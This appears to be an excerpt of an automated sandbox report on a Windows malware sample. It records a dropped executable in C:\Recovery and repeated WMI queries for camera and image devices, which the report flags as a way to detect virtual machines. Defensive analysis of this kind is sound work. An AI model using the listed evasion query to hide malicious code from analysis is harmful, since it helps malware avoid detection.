                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
